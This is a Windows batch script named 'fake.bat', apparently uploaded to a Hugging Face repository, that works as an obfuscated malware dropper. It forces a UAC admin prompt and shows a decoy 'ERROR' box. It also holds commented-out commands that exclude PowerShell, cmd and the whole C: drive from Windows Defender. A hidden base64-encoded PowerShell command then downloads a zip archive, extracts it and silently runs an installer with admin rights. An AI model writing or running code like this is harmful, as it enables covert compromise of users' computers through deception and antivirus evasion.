vormik / fake.bat
vorms's picture
Upload fake.bat
4a9416e verified
@echo off
:: 1. Запрос прав администратора
:: Проверяем, запущен ли скрипт от имени администратора
net session >nul 2>&1
if %errorLevel% == 0 (
echo Running as admin.
) else (
echo Requesting admin privileges...
:: Запуск скрипта от имени администратора
powershell -Command "Start-Process '%~f0' -Verb RunAs"
exit /b
)
if exist "%userprofile%\vorm" (
echo Папка существует. Закрываемся...
exit /b
)
:: 2. Вывод окна "HELLO"
:: Используем PowerShell для отображения окна с сообщением
powershell -Command "Add-Type -AssemblyName PresentationFramework; [System.Windows.MessageBox]::Show('ERROR', 'Message')"
::PowerShell.exe -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell.exe -ArgumentList '-NoProfile -ExecutionPolicy Bypass -Command \"Add-MpPreference -ExclusionProcess powershell.exe, cmd.exe\"' -Verb RunAs -WindowStyle Hidden}"
::timeout 5
::PowerShell.exe -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell.exe -ArgumentList '-NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath C:" ' -Verb RunAs -WindowStyle Hidden}"
:: 3. Скрыть консоль и продолжить выполнение в фоновом режиме
:: Запускаем PowerShell в фоновом режиме для выполнения дальнейших действий
powershell -Command "Start-Process powershell -ArgumentList '-NoProfile -WindowStyle Hidden -EncodedCommand "JAB1AHMAZQByAG4AYQBtAGUAIAA9ACAAJABlAG4AdgA6AFUAUwBFAFIATgBBAE0ARQA7AAoACgAkAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBfAGYAbwBsAGQAZQByACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAJAB1AHMAZQByAG4AYQBtAGUAXAB2AG8AcgBtAGkAbgBzAHQAYQBsAGwAYQB0AGkAbwBuACIAOwAKAAoAJAB6AGkAcABfAGYAaQBsAGUAIAA9ACAAIgAkAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBfAGYAbwBsAGQAZQByAFwAdgBvAHIAbQAuAHoAaQBwACIAOwAKAAoAJABkAG8AdwBuAGwAbwBhAGQAXwB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBoAHUAZwBnAGkAbgBnAGYAYQBjAGUALgBjAG8ALwB2AG8AcgBtAHMALwB2AG8AcgBtAGkAawAvAHIAZQBzAG8AbAB2AGUALwBtAGEAaQBuAC8AdgBvAHIAbQAuAHoAaQBwAD8AZABvAHcAbgBsAG8AYQBkAD0AdAByAHUAZQAiADsACgAKAAoACgBpAGYAIAAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZABlAHMAdABpAG4AYQB0AGkAbwBuAF8AZgBvAGwAZABlAHIAKQApACAAewAKAAoAIAAgACAATgBlAHcALQBJAHQAZQBtACAALQBJAHQAZQBtAFQAeQBwAGUAIABEAGkAcgBlAGMAdABvAHIAeQAgAC0AUABhAHQAaAAgACQAZABlAHMAdABpAG4AYQB0AGkAbwBuAF8AZgBvAGwAZABlAHIAIAB8ACAATwB1AHQALQBOAHUAbABsADsACgAKAH0ACgAKAAoASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAZABvAHcAbgBsAG8AYQBkAF8AdQByAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHoAaQBwAF8AZgBpAGwAZQA7AAoACgBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAkAHoAaQBwAF8AZgBpAGwAZQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIAAkAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBfAGYAbwBsAGQAZQByACAALQBGAG8AcgBjAGUAOwAKAAoACgAKACQAaQBuAHMAdABhAGwAbABlAHIAXwBwAGEAdABoACAAPQAgACIAJABkAGUAcwB0AGkAbgBhAHQAaQBvAG4AXwBmAG8AbABkAGUAcgBcAGkAbgBzAHQAYQBsAGwAZQByAC4AYgBhAHQAIgA7AAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABpAG4AcwB0AGEAbABsAGUAcgBfAHAAYQB0AGgAKQAgAHsACgAKACAAIAAgACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABpAG4AcwB0AGEAbABsAGUAcgBfAHAAYQB0AGgAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuADsACgB9ACAAZQBsAHMAZQAgAHsACgAKACAAIAAgACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBJAG4AcwB0AGEAbABsAGUAcgAuAGIAYQB0ACAAbgBvAHQAIABmAG8AdQBuAGQAIABpAG4AIAAkAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBfAGYAbwBsAGQAZQByACIAOwAKAH0ACgAKACQAaQBnAG4AbwByAGUAdABoAGkAcwAgAD0AIAAiAGEAegBhADAAcwBkAHMAZABzAGsAIABqACAAagAgAGoAagAgAGoAagAgAGYAZABrAGQAawAgAHMAIABzACAAcQB3AHEAZQAgAHcAZQAgAGUAIAByADQAIAA0ACAANQAgADYAIAA3ACAAawBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAgAGsAIABrACAAawAgAGsAawBrACAAawAgAGsAIABrACAAawAgACAAawBrACAAawAgAGsAIABrACAAawAgAGsAIABrAGsAIABrACAAawAgAGsAIABrACAAawAgAGsAIABrACAAawAgAGsAIABrACAAawAgAGsAIABrACAAawAgAGwAIgA7AA=="'
:: Завершение основного скрипта
exit